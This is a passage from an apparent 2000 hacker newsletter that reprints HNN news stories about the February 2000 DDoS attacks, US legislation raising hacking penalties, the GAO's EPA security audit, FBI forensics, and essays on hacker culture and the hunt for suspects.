      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by Evil Wench 
      
      In-Q-Tel, the CIA's recently formed venture capital fund, has entered
      into a $3 million contract with Science Applications International Corp.
      (SAIC) for development of software designed to protect Web sites against
      DoS attacks and to make computer addresses invisible to sniffers.
      
      Washington Post
      http://search.washingtonpost.com/wp-srv/WPlate/2000-02/16/106l-021600-idx.html
      (404)
      
      @HWA
      
60.0  HNN:Feb 20th:Bill Will Double Title 18 Penalties
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      Sen. Kay Bailey Hutchison, R-Texas will be introducing a bill next week
      that will alter Title 18 of the US Criminal Code to double the current
      five-year penalty for engaging in "fraud or related activity in
      connection with computers." The bill will also create the establishment
      of a National Commission on Cyber security,  which would be given six
      months to present findings on protecting computers from malicious
      attacks. (Show me one case where increased penalties would have made a
      difference.)
      
      Computer Currents
      http://www.currents.net/newstoday/00/02/17/news4.html
      
      News Story
      Bill To Double Hacker Sentences By: Robert MacMillan, Newsbytes. February 
      17, 2000 URL: http://www.currents.net/newstoday/00/02/17/news4.html

      Penalties for malicious hackers who crack private computers would double 
      if Sen. Kay Bailey Hutchison, R-Texas, can move her new bill successfully 
      through the Senate.

      Hutchison next week is expected to introduce legislation that would alter 
      Title 18 of the US Criminal Code to increase double the current five-year 
      penalty for engaging in "fraud or related activity in connection with 
      computers."

      Hacking penalties would increase from five to 10 years for the first 
      offense, and from 10 to 20 years for the second offense.

      The legislation also would establish a National Commission on 
      Cybersecurity, which would be given six months to present findings on 
      protecting computers in the Internet age from wired misappropriation.

      Hutchison's legislation, along with a planned measure announced in a 
      Senate subcommittee today by House Judiciary Committee Ranking Member 
      Patrick Leahy, D-Vt., represents two of the initial congressional 
      responses to the spate of denial-of-service attacks that took down several       
      well-known Web sites last week.

      "Current law treats computer hackers like harmless 'thrill seekers' when 
      in reality they are reckless drivers on the information superhighway," 
      Hutchison said. "It is clear they now have the capability to disrupt 
      service to millions of Americans and cause countless dollars in damages to 
      US       business."

      Hutchison's bill, a spokesperson told Newsbytes, likely will establish 
      monetary penalties based on the amount of damage done to corporate 
      Websites, but also would figure in "pain and suffering-style" costs for 
      the amount of damage to the public caused by cracks and other kinds of 
      computer       assaults.

      "When you define damage...it might be a little unclear," the spokesman 
      said, using a hypothetical example of eBay and $5,000. "Did it cost eBay 
      $5,000 to simply fix the service outage, versus 'Did we lose $5,000 in 
      lost opportunities, market capitalization and customer dissatisfaction?'"

      Hutchison has been active in several other high-tech legislative 
      initiatives, including the introduction of S. 1660 in September 1999, a 
      bill that establishes cyberstalking penalties. That bill is awaiting a 
      hearing in the Senate Judiciary Committee, while a mirror version of the 
      bill introduced by Rep.       Sue Kelly, R-N.Y., passed the House.

      Hutchison also is co-chairman of the Senate Republican High-Tech 
      Taskforce, along with nearly defunct Y2K Committee Chairman Robert 
      Bennett, R-Utah. She also serves as the chairman of the Senate Commerce 
      Subcommittee on Science, Technology and Space.

      Bennett has proposed to Senate Majority Leader Trent Lott that the Senate 
      establish a cyberterrorism and Internet security committee after the Year 
      2000 Committee's demise.

      Reported by Newsbytes.com

      
      
      @HWA
      
61.0  HNN:Feb 20th:Racketeering Charges Sought for Cyber Criminals
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Weld Pond 
      
      FBI Director Louis Freeh told a Senate subcommittee Wednesday that online
      criminals should be considered racketeers and hit with lengthy prison
      terms if it can be proven the assaults were part of an extensive,
      organized criminal enterprise.  Federal racketeering, or RICO, laws have
      traditionally been used to prosecute mobsters and drug cartels.
      (Again, when have increased penalties effected the number of crimes
      committed? Why don't we spend more time on prevention. Or have we
      given up on that already?)
       
      USA Today
      http://www.usatoday.com/news/washdc/ncswed02.htm
      (incorrect story url linked... - Ed)
      
      @HWA
      
62.0  HNN:Feb 20th:Serious Online Security Issues Found at EPA
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Evil Wench 
      
      A General Accounting Office audit team reported to the House Commerce
      committee that they found "serious and pervasive problems" with the
      information security implementation of the EPA Systems. The GAO audit
      team was able to penetrate systems that held sensitive and national
      security-related information. In response to this report the GAO has
      temporarily shut down all of their web sites for fear of cyber attack.
      
      FundamentalWeaknesses Place EPA Data and Operations at Risk - PDF
      http://www.gao.gov/new.items/ai00097t.pdf
      
      
      Federal Computer Week
      http://www.fcw.com/fcw/articles/2000/0214/web-epanetwork-02-18-00.asp      
      
      ZDNet - via Yahoo
      http://dailynews.yahoo.com/h/zd/20000218/tc/20000218057.html
      (404)
      
      
      Federal Computer Weekly:
      
      
      Network security problems at EPA "serious and pervasive"

      BY Diane Frank and Paula Shaki Trimble 02/18/2000 

      The Environmental Protection Agency late Tuesday temporarily shut down all 
      access to the Internet following revelations that the agency's information 
      systems and policies suffered from fundamental security weaknesses.

      The decision to temporarily terminate access to the agency's public and 
      private systems came after a General Accounting Office audit team 
      performing security testing at EPA reported to the House Commerce 
      committee that they found       "serious and pervasive problems that 
      essentially render EPA's agencywide information security program 
      ineffective."

      The types of problems GAO found -- including improperly configured 
      firewalls, vulnerabilities that allowed GAO to take control of EPA's major 
      systems, and a reliance on insecure password controls -- are issues that 
      every federal agency       experiences, but not to this extent, said David 
      McClure, associate director of governmentwide and defense information 
      systems in GAO's Accounting and Information Management Division.

      "The scope and the severity of the weaknesses at EPA were more extensive 
      then we've seen," McClure said.

      The EPA systems GAO penetrated hold sensitive and national 
      security-related information. They include the National Computing Center's 
      mainframe in Research Triangle Park, N.C., which is one of the systems the 
      White House named       in 1998 as critical to defending against 
      cyberattacks.

      "We knew their lack of security was bad. We didn't know how bad," 
      committee spokesman Steve Schmidt said. "We felt we had no choice but to 
      force EPA's hand if they did not shut down the site."

      EPA maintained that the shutdown is only temporary.

      "Our access to the Internet as well as public access has been temporarily 
      suspended while [the National Technology Services Division] implements 
      security measures," said Jerry Slaymaker, senior advisor to the EPA chief 
      information       officer. Slaymaker said the agency hopes to restore 
      limited Internet access by Feb. 22.

      The agency had to shut down the Internet site in addition to its internal 
      network because "we have to go to the place where entrance is being gained 
      or potentially can be gained through the Web site," Slaymaker said. There 
      is no way to       repair the front door without limiting all access, he 
      said.

      "Public access to information is a serious part of the agency's business,"
       he said. "The only thing more important is security of the information."
       
      
      
      @HWA
      
63.0  HNN:Feb 20th:FBI Reveals ACES
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by xx cu se me 
      
      In testimony before the Senate Appropriations Subcommittee on Wednesday,
      FBI Director Louis Freeh revealed a new program the agency calls the
      Automated Computer Examination System. ACES allows investigators to
      examine huge areas of magnetic media quickly looking for forensic
      evidence on computer crimes. This new system was developed in response to
      the ever increasing size of hard drives today that vastly increases the
      area that needs to be searched.
      
      The Register UK
      http://www.theregister.co.uk/000217-000003.html
      
      
      Posted 17/02/2000 10:53am by Thomas C. Greene in Washington
      
      How the FBI can r00t your hard drive
      
      The FBI is working hard to establish itself as the world's premier computer forensics expert. 
      
      The Bureau has deployed 193 Special Agents devoted specifically to cyber crime, along with 
      more than 100 related support personnel at FBI Headquarters in Washington, and 142 "parts 
      examiners" busily recovering data from seized computers in the field, FBI Director Louis 
      Freeh told the Senate Appropriations Subcommittee Wednesday. 
      
      "These are people who can take evidence off a hard drive that even fairly sophisticated users
      would think had been erased," Freeh explained.
      
      Most computers sold in 1998 featured hard drives of six to eight GB capacity. But by the end 
      of this year, sixty to eighty GB hard drives will be common, he noted -- and with considerable
      exaggeration, we observe. To tell the truth, twenty to forty GB hard drives will be "common" 
      towards the end of this year. Sixty to eighty... well, that will remain in the realm of "dream
      boxes" for some time to come. 
      
      In any event, the continuing development of big HDDs "vastly increases the area that needs to 
      be searched", he complained. 
      
      Yet there is hope on the horizon. The FBI has developed a program it calls the Automated 
      Computer Examination System (ACES), which allows investigators to examine huge areas of 
      magnetic media quickly, Freeh revealed.  
      
      This, combined with the FBI's Computer Wizards' ambition to "de-centralise computer 
      examination," should eventually yield an efficient mechanism for lifting data from 
      confiscated boxes, he reckons. 
      
      One putatively successful effort along these lines is a collaboration between the FBI and 
      the San Diego Regional Computer Forensics Laboratory. 
      
      This de-centralised approach is supposed to increase the Bureau's efficiency in forensic
      investigation. New centres are planned for New England and Texas, and ought to be running
      soon, Freeh said. 
      
      @HWA
      
      
      
64.0  HNN:Feb 20th:New Version of DeCSS Available
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Unprivileged user 
      
      Pigdog Journal has published a perfectly legal, harmless, and possible
      useless program to strip Cascading Style Sheet tags. This new application
      is being named - DeCSS and has nothing at all to do with DVDs. (This
      should be a good sized pain in the ass for DVD-CCA's lawyers.)
      
      Pig Dog Journal
      http://www.pigdog.org/decss/
      
      
      @HWA
      
65.0  HNN:Feb 20th:Y2K Hack Planned for Israel, Local Officials Nervous
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
       
      contributed by Code Kid
      
      Anat Maor a member of the Meretz party and head of the Knesset's (Israeli
      Parliament) Committee for Scientific and Technological Research and
      Development, was outraged that a hacker convention was taking place in
      Isreal. Claiming that 'Hacking' was illegal she is trying to get the
      conference canceled.  As far as we know the conference is still on
      schedule.
      
      Wired
      http://www.wired.com/news/politics/0,1283,34349,00.html      
      
      HNN Cons Page
      http://www.hackernews.com/cons/cons.html
      
      
      Y2K Hack
      http://www.y2hack.com
      
      
      @HWA
      
66.0  HNN:Feb 21st:French Say Windows is BackDoored By NSA
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by William Knowles and
      Patrick 
      
      A report written by a senior officer of the Strategic Affairs
      Delegation (DAS), a french intelligence agency, has accused the
      National Security Agency (NSA) of working with computer giant Microsoft
      to develop software allowing Washington to spy on communications around
      the world. (The only way Microsoft could be so powerful is with the
      help of the always streamlined and super-efficient US Government.)
      
      The Age
      http://www.theage.com.au/breaking/0002/19/A27800-2000Feb19.shtml
      
      Yahoo News
      "http://english.hk.dailynews.yahoo.com/headlines/world/cna/article.html?
      s=hke/headlines/000219/world/cna/US_secret_agents_work_at_Microsoft_cla
      ims_French_intelligence_report_.html"      
      
      Intelligence Online - In French
      http://www.intelligenceonline.fr      
      
      Intelligence Online - English
      http://www.IntelligenceOnline.com
      
      The Age;

      US secret agents work at Microsoft: French intelligence

      Source: AFP | Published: Saturday February 19, 7:44 AM 

      PARIS, Feb 18 - A French intelligence report today accused US secret 
      agents of working with computer giant Microsoft to develop software 
      allowing Washington to spy on communications around the world.

      The report, drawn up by the Strategic Affairs Delegation (DAS), the 
      intelligence arm of the French Defence Ministry, was quoted in today's 
      edition of the news-letter Le Monde du Renseignement (Intelligence World).

      Written by a senior officer at the DAS, the report claims agents from the 
      National Security Agency (NSA) helped install secret programmes on 
      Microsoft software, currently in use in 90 per cent of computers.

      According to the report there was a 'strong suspicion' of a lack of 
      security fed by insistent rumours about the existence of spy programs on 
      Microsoft, and by the presence of NSA personnel in Bill Gates' development 
      teams.

      The NSA protects communications for the US government, and also intercepts 
      electronic messages for the Defence Department and other US intelligence 
      agencies, the newsletter said.

      According to the report, 'it would seem that the creation of Microsoft was 
      largely supported, not least financially, by the NSA, and that IBM was 
      made to accept the (Microsoft) MS-DOS operating system by the same 
      administration.'

      The report claimed the Pentagon was Microsoft's biggest client in the world.
      
     
      
      @HWA
      
67.0  HNN:Feb 21st:France Reported to Have Frenchelon
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Weld Pond 
      
      Evidence is surfacing that the French Government has been funding its
      own version of Echelon, a global eavesdropping network, that has
      been dubbed Frenchelon. Listening stations for the French network are
      reported to be in French Guiana, in the city of Domme in the Dordogne
      region of southwestern France, in New Caledonia, and in the United Arab
      Emirates. It is also thought that Germany may be involved to help fund
      the project.
      
      Communications Week International - via cfp.org     
      http://www.cfp99.org/program/papers/cukier.htm      
      
      @HWA
      
68.0  HNN:Feb 21st:DDoS Attacks Mask the Real Threat
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by William Knowles 
      
      While denial of service attacks make the headlines around the world the
      real threat to computer security continues on its merry way
      unobstructed by the commotion. Corporate espionage and disgruntled
      employees are still out there causing trouble, often undetected.
      
      The Register UK
      http://www.theregister.co.uk/000218-000018.html
      
      Posted 18/02/2000 1:59pm by Thomas C. Greene in Washington

      Dot-Com firms are hacking each other -- expert

      All this talk of fifteen-year-old kids vandalising the Web is a smoke 
      screen behind which dangerous, professional crackers are pleased to take 
      cover, security expert Mark Rasch revealed during testimony before a 
      Senate hearing on Internet security earlier this week. 

      The lure of big, fast-money scores in virtual commerce is making it common 
      for skilled hackers to attack competitors in search of free intellectual 
      property, Rasch said before the Senate Appropriations Subcommittee. 

      The present era of "dot-com millionaires and IPO frenzies and the ease of 
      starting your own business" on the Web is creating "a tremendous amount of 
      competition to acquire intellectual property" by any means at hand, Rasch, 
      a vice president with security outfit Global Integrity, explained. 

      "We see sophisticated attacks against computer systems in order to steal 
      intellectual property which can be used in competition with other 
      companies," he added. 

      Info tech companies may be willing to report a nuisance attack such as the 
      recent DDoS campaign, where no company assets are compromised. But Rasch 
      believes that serious, costly, compromising attacks are rarely reported to 
      the authorities. 

      This is because such companies, which own nothing of substance but are 
      valued principally according to the information they possess, depend 
      heavily on consumer confidence. A prosecution and trial, Rasch observes, 
      would make public the security vulnerability that was exploited, hence the 
      company's hopelessly inadequate security measures, he implied. 

      An info tech company will typically lose between ten and one hundred times 
      more money from shaken consumer confidence than the hack attack itself 
      represents if they decide to prosecute the case, he estimated. 

      Further impediments to accurate cyber-crime reporting come from "a 
      fundamental distrust" of law enforcement among the info tech industry. One 
      common fear is that a crucial piece of equipment, like a main server, say, 
      might be impounded for evidence by over-zealous investigators, thereby 
      shutting the company down. 

      It's hardly a surprise, then, that Rasch cited an estimate claiming that 
      fewer than one in ten serious intrusions are ever reported to the 
      authorities. 

      We can safely assume that the few which are reported tend to be those 
      least likely to shake consumer confidence. This explains why the public 
      has been misled into believing that graffiti attacks and other nuisance 
      intrusions by teenagers account for most of the cyber-crime going on. 

      In fact, because it is to a company's advantage to suffer in silence, the 
      real malicious hacking, which would involve the compromising of crucial 
      data and intellectual property by rival tech firms -- and which probably 
      represents the lion's share of online criminal activity -- is kept as a 
      closely-guarded, dirty little secret.  


      
      @HWA 
      
       
      
69.0  HNN:Feb 21st:Earlier Attacks on IRC Servers Could Have Been a Warning
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Evil Wench 
      
      Distributed denial of service attacks against various IRC hosts may
      have been precursor to the actual attacks against the larger targets.
      Administrators at Internet America, a mid sized Dallas ISP, say that
      their IRC servers where hits weeks before Yahoo with a similar attack
      and believe that it was not a coincidence. 
      
      Washington Post
      http://www.washingtonpost.com/wp-dyn/articles/A6148-2000Feb18.html
      
      Hackers' Web Weapons Test-Fired on Chat Sites
  
     
     By Ariana Eunjung Cha Washington Post Staff Writer Saturday, February 19, 
     2000; Page E01 

     
     Long before the recent attacks on Yahoo and other popular mainstream Web 
     sites caused an international outcry, a similar kind of electronic warfare 
     raged within the online chat communities that are popular hangouts for 
     hackers. 

     The Internet Relay Chat networks--known by names such as DALnet, EFNet and 
     the Undernet--are subnets made up of dozens of servers around the planet. 
     Often compared to citizens' band radio, they host free, real-time 
     conversations about everything from computer graphics cards to gardening. 
     But because the systems allow anonymous log-ins, some areas have become 
     virtual town squares where hackers gather to trade "warez"--pirated 
     software and cracking programs--and to brag about their conquests.

     Their visibility in the hacker community has made them "testing grounds" 
     for new attack strategies like the new "distributed denial of service" 
     method that took down more than a dozen popular World Wide Web sites last 
     week, Internet Relay Chat administrators said. This tactic pummels 
     computers with so much data that legitimate users are effectively locked 
     out.

     "Anything that you see in the wild you are going to see directed at some 
     sort of chat server first," said a security director for Internet America 
     Inc., a mid-size service provider in Dallas that is traded on the Nasdaq 
     Stock Market under the symbol GEEK.

     The Internet America security expert, who did not want to be named because 
     she is participating in a number of investigations, said that in early 
     February, a week before the recent series of high-profile attacks, her 
     company's server was hit with a similar strike so powerful that it shut out 
     many of its paying subscribers for about three hours.

     She said she believes that was "no coincidence."

     Even as FBI agents and independent cybersleuths in the past week have been 
     trolling Internet Relay Chat (IRC) to look for clues about the person who 
     took down Yahoo and other popular sites, the chat networks themselves 
     continue to be hit almost daily with similar attacks.

     "We've been fighting . . . for over three years now," said Danny Mitchell, 
     co-owner of Internet Chat Systems in Plano, Tex., which maintains a machine 
     linked to the Undernet and fends off denial-of-service strikes several 
     times a week. "It's nothing new. At least now it has people's attention 
     since it happened against someone important."

     The IRC networks' anarchist nature--born out of the open philosophy of the 
     original Internet--further makes them an attractive target, said Dave 
     Dittrich, a software engineer at the University of Washington-Seattle who 
     has researched denial-of-service attacks.

     The IRC networks allow users to create private chat rooms, known as 
     channels. The most effective way to break into these conversations is to 
     take down the machine being used by the person who owns the room and hijack 
     the channel.

     In addition, Dittrich and others say IRC has become such an efficient mode 
     of communication that rival hacker groups have taken down servers to 
     prevent them from speaking with each other.

     "It's some kind of power play," said Sven Nielsen, 23, the founder of 
     DALnet. "The hacker will run a denial-of-service attack proving 'I'm bigger 
     than you because I can run this tool against you.' "

     Two days ago, Baltimore-based ABSnet, which is part of the Undernet, one of 
     the oldest and largest gathering places, with more than 50,000 simultaneous 
     users during peak hours, was pummeled with massive numbers of bogus 
     requests for data that sought to muscle out legitimate users. Similar 
     attacks hit its servers on Sunday, Monday and Tuesday--and that was 
     considered a good week.

     The fake data blocked only about half the pipeline through which users 
     exchange information, rather than closing it completely and crashing the 
     network, as it did late one night in January.

     "It used to be very hard to knock us off the map, but now the tools are 
     available to practically anybody" said Howard Leadmon, president of ABSnet 
     Internet Services Inc., which hosts the Undernet's command center. "Joe 
     Blow's kid can now surf the Web and find some hacker site and he's become a 
     one-man warrior."

     Albert Ramnath, a director of Chatnet, an Undernet rival, said his network 
     has fended off similar hits for years. "This morning we had six servers fly 
     apart. This is daily. All it is is 14-year-olds having nothing to do, and 
     we take the heat," he said.

     Just a few years ago, most IRC services were hosted on university 
     computers. Most of the schools bailed when denial-of-service attacks began 
     in earnest and they found hosting the services too much of a headache. Now 
     IRC is maintained largely by private companies, almost all of them Internet 
     service providers with large data pipes like America Online Inc. and AT&T 
     Corp. (They are one of only a few places on the World Wide Web that have 
     resisted commercialization; companies donate their services and very few 
     make any money off the service.)

     With the invention of new, more powerful software late last year that 
     allows malicious hackers to hijack dozens of machines to use against a 
     single server, the attacks have become even more virulent. That has made 
     several hosting companies either pare back their involvement or unhook 
     their servers from a number of IRC networks; several chat services have had 
     to shut down as a result.

     About eight companies have left the Undernet in the past year as a result 
     of the attacks, Leadmon said, and now fewer than 40 are left. He added that 
     several of those businesses lost thousands of dollars in bandwidth and 
     man-hours when their networks were taken down.

     "I'll be the first to admit it that if they attacked 24 hours a day, I 
     would have to pull every Undernet server down. They would put me out of 
     business," said Leadmon, whose company serves both consumer and business 
     Internet users throughout the Washington-Baltimore area. "There is a limit 
     to nice."

     One of the people who have claimed credit for attacking the Undernet in the 
     past uses the name "Coolio" and was once affiliated with the hacker group 
     Global Hell, a group of teens who gained notoriety last year for defacing 
     the White House Web site and breaking into an Army computer. That name 
     resurfaced last week as a potential suspect in the recent spate of attacks 
     against Yahoo and other sites, although people in the computer underground 
     said many people use "Coolio," after the rap star of the same name.

     
      2000 The Washington Post Company 


      
      @HWA
      
70.0  HNN:Feb 21st:New DDoS Attacks Stories and Angles
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by Evil Wench 
      
      The FBI is still furiously attempting to dig up information in regards
      to the now two weeks old denial of service attacks against a dozen or
      so major web sites. The media frenzy over the this case has reached
      unheard of levels. Some reporters are now taking a step back and
      looking at all the commotions and what it really means, other are just
      looking to report on anything that may be 'hacker' related.
      
      Richard Thieme comments on the difference of 'hackers' and
      'script-kiddies' and how the meaning of the word 'hacker' has warped so
      much in the last few years.

      The Village Voice
      http://www.villagevoice.com/issues/0007/thieme.shtml
      
      
      
      Bronc Buster takes a look at law enforcement and how well they have
      handled or bungled this case, you decide.
      
      The Synthesis
      http://www.thesynthesis.com/tech/keystonecybercops/index.html
      
      
      Old school vs. new school, hacker vs. script-kiddie. Nothing new here
      they just needed a 'hacker' story for the Friday edition.
      
      Washington Post
      http://www.washingtonpost.com/wp-srv/WPlate/2000-02/18/191l-021800-idx.html
      
      
      Village Voice;
      
      HACKING THE FUTURE
      BY RICHARD THIEME Why Code Crackers Will Lead the Digital Age 


        Let's get our definitions straight. Last week's attacks on dozens of Web 
        sites were not the work of hackers. They were the work of script 
        kiddies, and the difference is everything. Script kiddies download 
        ready-made tools and use them to damage the network. Script kiddies 
        criminally distort the essential ethos of hacking, which is to pass 
        through the network without a trace. Hackers read the unknown, sense the 
        contours of the codes that make all tomorrow's parties and stock market 
        booms. 

      It's no wonder that last week hackers everywhere cringed when the media 
      confused them with script kiddies. Not less than 10 years ago, the word 
      hacker conjured a dedicated geek, hunched over a glowing terminal, working 
      late into the night to solve an intractable dilemma. Now hacker means 
      something akin to cybercriminal. The semantic shift is regrettable, not 
      only because the distortion inhibits clarity, but because it buries a 
      piece of history we'd be wise to keep fresh: It was hackers who cobbled 
      together the Internet. 

      Let's define our terms again. Hacking is a quest for knowledge. You can 
      see the essence of the activity in meetings at security firms like Secure 
      Computing, where hackers are a key part of the professional services team. 
      With clients in the Fortune 500 and three-letter government agencies, like 
      the CIA and FBI, the stakes are high, and when the firm faces a perplexing 
      problem, brainstorming sessions go late into the night. Ideas fly from one 
      person to another like pinballs off flippers, as the group mind turns over 
      and examines the puzzle from all sides. 

      Group mind. There's a concept that flows from the structure of the 
      Internet itself, parallel processor harnessed to parallel processor to 
      achieve a single goal. It's no coincidence that information technology 
      professionals often think in a style similar to the way computers 
      calculate. The network taught them how to reason digitally; it imprinted 
      itself on their minds just as they imprinted their minds on it. 

      Is it any wonder, then, that hackers are the leaders of the new 
      millennium? Again, a question of terminology. By leader I mean someone who 
      forges ahead and names the dim future. Consider Tim Berners-Lee, who 
      designed the first Web protocols and wrote the first browser code. 
      Berners-Lee was a hacker. Or consider Richard Stallman, the evangelist of 
      Open Source software. Stallman is an extraordinary hacker. I could go on 
      and on. I recently consulted with a major mutual fund, and after the 
      meeting I traded war stories with its head of IT. He fondly recalled the 
      old days of hacking Unix systems. That this former "delinquent" now runs a 
      system executing billion-dollar transactions is not shocking. Most of the 
      bright people in the IT business learned how to hack bywhat 
      else?hacking. 

      Let's go back to Open Source for a moment. It's now the conventional 
      wisdom that the Linux operating system and GNU Project are miracles of 
      modern computing, which may one day triumph over the clunky software 
      produced by the Microsoft-Apple cartel. Stallman launched the GNU Project 
      by asking hackers to volunteer their services. Of course, they did. 
      Likewise, Linux was founded on the belief that complex systems must be 
      open, evolving, and free in order to reach their full potential. In other 
      words, they must be hackable and they must be hacked. Continuously. 

      Now comes the FBI and President Clinton with criminal sanctions for these 
      script kiddies. It's right and just to keep the peace, but let's remember 
      that in the Internet's embryonic stage, hacking, far from being criminal, 
      was encouraged. When computers were first networked through telephone 
      lines and slow modems, bulletin boards emerged as crossroads where 
      cybertravelers could leave messages and valuable information about how the 
      phone lines intersected with microprocessors. By these postings, the 
      network formed a symbiotic relationship with its users, and through the 
      give and take of countless exchanges between hackers, the network 
      bootstrapped itself to a higher level of complexity. As Tom Jackiewicz, 
      who helps administer upt.org, an outgrowth of the hackers' favorite, the 
      UPT Bulletin Board, recalls, "In the old days of a decade ago, no kid 
      could afford a Solaris workstation. The only machines available were 
      online. You could learn only by roaming the network." 

      Today the stakes are higher, security tighter, but the basic modalities of 
      hacking and its relationship to innovation remain. The challenge du jour 
      is the gauntlet thrown down by Microsoft, which claims that Windows NT, 
      the operating system of many businesses, is secure. What a claim! For a 
      baseball fan it would be like hearing the Yankees brag that they could 
      play an entire season without losing a single game. Hackers love to find 
      flaws in Windows NT. For them, the payoff is the power rush of the thunk! 
      when the stone hits Goliath in the forehead. 

      One of the sharpest stones to leave a hacker's sling is a program called 
      Back Orifice 2000. Developed by a group called Cult of the Dead Cow, the 
      program can be loaded stealthily on a Windows network, giving a remote 
      user control over the network. Why develop such a weapon? In the current 
      environment of ubiquitous distributed computingthat is, networks and 
      nodes everywherethe hackers argue that no operating system protects 
      against stealthy executables like Back Orifice. So the program is a form 
      of shock therapy. It jerks Microsoft into action, stirring an indolent 
      industry into making the Internet more secure. The upgrades that come as a 
      result benefit every Windows user. 

      As a culture we are just beginning to recognize this dynamic. One of the 
      first hacker groups to benefit from our grudging acceptance of the craft 
      is LOpht, which crossed over from the computing underground to the 
      mainstream after finding flaws in Windows NT. Their transition has been so 
      successful that when Congress conducted an investigation into Internet 
      security it asked two LOpht members, Mudge and Weld Pond, to come to 
      Washington for a briefing. Now LOpht has teamed up with former Compaq 
      Computer executives to form @Stake, a security firm that has the media and 
      Wall Street swooning. 

      So when is a hacker not a felon? When he receives $10 million in venture 
      capital? When Congress invites him to a hearing? 

      When we lump all hackers into a criminal class we are liable to forget 
      their essential role as architects of the information age. Edward O. 
      Wilson said that scientists are characterized by a passion for knowledge, 
      obsession, and daring. Hackers share that passion, the hunter-gatherer 
      gene for restless wandering, wondering what's beyond the next hill. They 
      hack because it's fun, because it's a challenge, and because the activity 
      shapes their identity. Their strengthslove of risk, toleration of ambiguity,
      and ability to sift meaning from disparate sourcespower the very network 
      we all rush to join. 

      Tell us what you think. editor@villagevoice.com 
      
     
     -=-
      
     Bronc Buster;The Synthesis
     
     
     Attacks on the internet's most popular sites has prompted a witch hunt
     carried out by the FBI and embittered corporations...
     
     By Bronc Buster
     
     
     Over the last few days, reports have surfaced in the media regarding two 
     names, Mafiaboy and Coolio, reportedly connected with last week's large-scale 
     denial-of-service attacks that managed to temporarily cripple some of the 
     Internet's most visited sites. The FBI is scrambling to track down these two 
     people, asking for court warrants and calling on informers for help in the 
     chase. 

      So what does the FBI have on these two people, Web users whose names are 
      being talked about in the media as though they were two of Americas most 
      wanted cyber-criminals?

      Recourse Technologies, a so-called Internet Security firm that tracks down 
      hackers, was the first to point a finger at a mysterious person who goes 
      by the name Mafiaboy. According to our investigations, as well       as 
      other reports starting to surface, the evidence this group has gathered 
      that supposedly fingers this person is almost laughable. It appears that, 
      last week, an employee from Recourse Technologies got on Inter-Relay Chat 
      and started to visit chat channels frequented by hackers and crackers 
      alike. From here, questions were asked regarding the attacks and someone 
      with the nickname "anon" claimed he was responsible. Later in the chat, he 
      admitted that his real nickname was "Mafiaboy," and not "anon" as he has 
      previously stated. A Wired.Com investigation turned up someone by the name 
      Mafiaboy who had an account at a Canadian Internet Provider, but was 
      removed in early 1998. Also quoted were Canadian authorities, who said 
      that they work closely with the FBI and were working with them on this 
      case, but to date had no knowledge of anyone named "Mafiaboy" in 
      connection to any case on which they were working.

      After getting on Inter-Relay Chat late Tuesday night, I myself was able to 
      find over half a dozen people going by the nickname Mafiaboy, and almost 
      all of them were playing up to the media hype; several of them       were 
      from Canada. Once I started asking questions, I got over 20 people on just 
      one network 'fessing up to being the person who did the attacks.

      What kind of hard evidence is this, and why is a technology-ignorant media 
      following it like a donkey with a carrot hung out over its head? 

      Coolio, the latest person to be fingered in these attacks by a report from 
      RSA (a company owned by Network Associates) and Stanford University, is 
      also somewhat of a mystery. According to the report, Coolio       had 
      claimed responsibility for the defacement of the RSA Web site last week, 
      which reports say mentioned one of the investigators working on the 
      denial-of-service attacks case. In addition to this, the report mentions 
      that Coolio had gain unauthorized access to a system in Russia, and had 
      other proofs that that reportedly connect him with these attacks. Also 
      according to the RSA report, Coolio is said to be living in the Midwest, 
      and they had found his location down to the street address, which was 
      turned over to the FBI.

      When we here at The Synthesis followed up on the RSA report, it took us no 
      more then a few hours to track down Cooilo. (I must admit that I know him, 
      and have had dealings with him in the past). Cooilo may       have 
      originally been from Champaign, Illinois, but now, according to friends 
      who asked to remain anonymous and a simple trace of his Internet Provider, 
      he now resides in the San Diego area of California. Although Coolio 
      refused comment on any questions I raised to him regarding this case and 
      his guilt or innocence, his friends said he had not committed these 
      crimes. They also added that he was deeply concerned that he was being set 
      up, and scared of a possible FBI raid on his residence in the near future.

      Although The Synthesis hasn't heard all the evidence against Coolio and 
      does not have access to the complete contents of the RSA report sent to 
      the FBI, doubts are starting to rise concerning Coolio's       
      responsibility in these actions. From talking to some of Coolio's friends 
      and long term associates, the general conscience is, not only did he not 
      have the resources to do these attacks, but lacks the level of skill being 
      described by some of the companies who were attacked. It could also be 
      that RSA, whose stock tumbled after their site was hacked by Coolio, have 
      other motives in fingering this hacker in the largest denial-of-service 
      attack in the history of the Internet.

      With so much media attention being focused on this case, it's almost a mad 
